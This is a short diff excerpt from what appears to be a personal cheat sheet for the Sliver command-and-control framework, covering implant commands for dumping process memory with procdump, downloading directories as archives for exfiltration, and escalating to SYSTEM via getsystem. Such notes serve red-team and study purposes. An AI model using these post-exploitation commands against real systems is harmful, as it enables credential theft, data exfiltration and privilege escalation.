7RU7H/Archive/Tools/C2/Sliver/Sliver-Cheatsheet.md

 procdump -p <PID>
-// Upload and Download - use absolute path upload download
+// Upload and Download - use absolute path upload
+// Download to the directory executed sliver-server/client
+// tar.gz recursively on a directory by default <feels good> download
+// extract after downloading
+// tar -xf $exfil

 // With Administrative and adble to get SeDebugPrivilege - by default uses spool.svc to getsystem getsystem